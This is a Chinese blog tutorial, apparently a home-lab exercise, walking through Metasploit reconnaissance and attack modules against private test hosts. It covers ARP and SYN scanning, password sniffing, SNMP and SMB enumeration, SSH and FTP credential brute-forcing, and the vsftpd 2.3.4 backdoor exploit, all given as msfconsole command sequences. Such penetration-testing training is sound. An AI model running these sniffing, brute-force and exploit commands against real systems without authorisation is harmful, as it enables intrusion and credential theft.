Metasploit渗透测试之信息收集

本文介绍了如何使用Metasploit框架进行网络扫描和漏洞利用,包括基于TCP的半连接扫描、ARP扫描、SNMP协议收集信息、SMB协议扫描共享文件和系统用户信息,以及SSH协议的版本检测和破解。此外,还涉及了FTP服务的版本检测、匿名登录扫描及暴力破解过程。
摘要由CSDN通过智能技术生成

基于 tcp 协议收集主机信息

先打开我们的Metasploit软件

使用 Metasploit 中的 nmap 和 arp_sweep 收集主机信息

尝试使用命令报错

db_nmap -sV 192.168.1.1

这是因为Metasploit框架的数据库没有正确的连接,我们需要解决这个问题

使用命令 msfdb init来初始化Metasploit框架的数据库

[*] exec: msfdb init

[+] Starting database

[+] Creating database user 'msf'

[+] Creating databases 'msf'

[+] Creating databases 'msf_test'

[+] Creating configuration file '/usr/share/metasploit-framework/config/database.yml'

然后再重新启动一下Metasploit就能够正常运行了

arp_sweep

Arp扫描

使用并且该模块并且查看需要配置的参数,这里打yes的则是需要配置参数。

use auxiliary/scanner/discovery/arp_sweep //使用模块

show options //查看配置

set RHOSTS 192.168.238.143 //设置被害者ip

复现成功图:

使用半连接方式扫描 TCP 端口

use auxiliary/scanner/portscan/syn //使用该模块

show options //查看相应的配置参数

设置响应的设置

msf6 auxiliary(scanner/portscan/syn) > set RHOSTS 192.168.238.143 //设置受害者主机

RHOSTS => 192.168.238.143

msf6 auxiliary(scanner/portscan/syn) > set PORTS 1-1080 //设置你要扫描的端口

PORTS => 1-1080

msf6 auxiliary(scanner/portscan/syn) > set THREADS 20 //设置线程

THREADS => 20

msf6 auxiliary(scanner/portscan/syn) > run //开始

成功的扫描出开放端口

使用 auxiliary /sniffer 下的 psnuffle 模块进行密码嗅探

这边选择先安装工具

search psnuffle //搜索这个模块

use auxiliary/sniffer/psnuffle //使用这个模块

run //运行

然后受害者连接别的主机

成功拦截登录账号和密码

基于 SNMP 协议收集主机信息

use auxiliary/scanner/snmp/snmp_enum //使用模块

set RHOSTS 192.168.238.143 //设置目标

run //启动

复现成功图:

使用 smb_enumshares 基于 SMB 协议扫共享文件(账号、密码)

首先我们要搭建环境,先开启一下共享服务。

use auxiliary/scanner/smb/smb_enumshares //使用模块

set RHOSTS 192.168.238.143 //设定目标

set SMBUser Administrator //设置账户

set SMBPass qq123456 //设置密码

run //开启

复现成功图:

使用 smb_lookupsid 扫描系统用户信息(SID 枚举)

我们先新建一个账户

//新建成功

use auxiliary/scanner/smb/smb_lookupsid //使用模块

set RHOSTS 192.168.238.143 //设置目标

set SMBUSER administrator //设置账户

set SMBPass 123456 //设置密码

run //开启

复现成功图:

基于 SSH 协议收集信息

先配置下环境,开启下SSH服务

sudo apt-get install openssh-server

msf6 auxiliary(scanner/smb/smb_lookupsid) > use auxiliary/scanner/ssh/ssh_version

msf6 auxiliary(scanner/ssh/ssh_version) > use auxiliary/scanner/ssh/ssh_version

msf6 auxiliary(scanner/ssh/ssh_version) > set RHOSTS 192.168.238.140

RHOSTS => 192.168.238.140

msf6 auxiliary(scanner/ssh/ssh_version) > run

成功图:

对SSH进行破解

msf6 auxiliary(scanner/ssh/ssh_login) > use auxiliary/scanner/ssh/ssh_login

msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.238.140

RHOSTS => 192.168.238.140

msf6 auxiliary(scanner/ssh/ssh_login) > set USERPASS_FILE /home/kali/Desktop/root_userpass.txt

USERPASS_FILE => /home/kali/Desktop/root_userpass.txt

复现成果图:

基于FTP协议收集信息

搭建环境

安装vsftpd

把这里改成On改成YES方便后续的匿名访问漏洞复现

查看ftp服务的版本信息

msf6 auxiliary(scanner/ssh/ssh_login) > use auxiliary/scanner/ftp/ftp_version //使用该模块

msf6 auxiliary(scanner/ftp/ftp_version) > set RHOSTS 192.168.238.144 //设定攻击ip

msf6 auxiliary(scanner/ftp/ftp_version) > run //启动

复现成功图:

vsFTPd 2.3.4漏洞利用

msf6 > search 2.3.4

use exploit/unix/ftp/vsftpd_234_backdoor //使用该模块

set RHOSTS 192.168.238.144 //设置攻击目标

run //启动

复现成功图:

ftp 匿名登录扫描

use auxiliary/scanner/ftp/anonymous

set RHOSTS 192.168.238.144

run

复现截图:

ftp 暴力破解

msf6 auxiliary(scanner/ftp/ftp_login) > use auxiliary/scanner/ftp/ftp_login //使用这个模块

msf6 auxiliary(scanner/ftp/ftp_login) > set RHOSTS 192.168.238.144 //设置目标

RHOSTS => 192.168.238.144

msf6 auxiliary(scanner/ftp/ftp_login) > set USERPASS_FILE /home/kali/Desktop/root_userpass.txt //指定账户密码

USERPASS_FILE => /home/kali/Desktop/root_userpass.txt

msf6 auxiliary(scanner/ftp/ftp_login) > run //启动

这里可以成功看出来爆破出账户密码是msfadmin:msfadmin

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值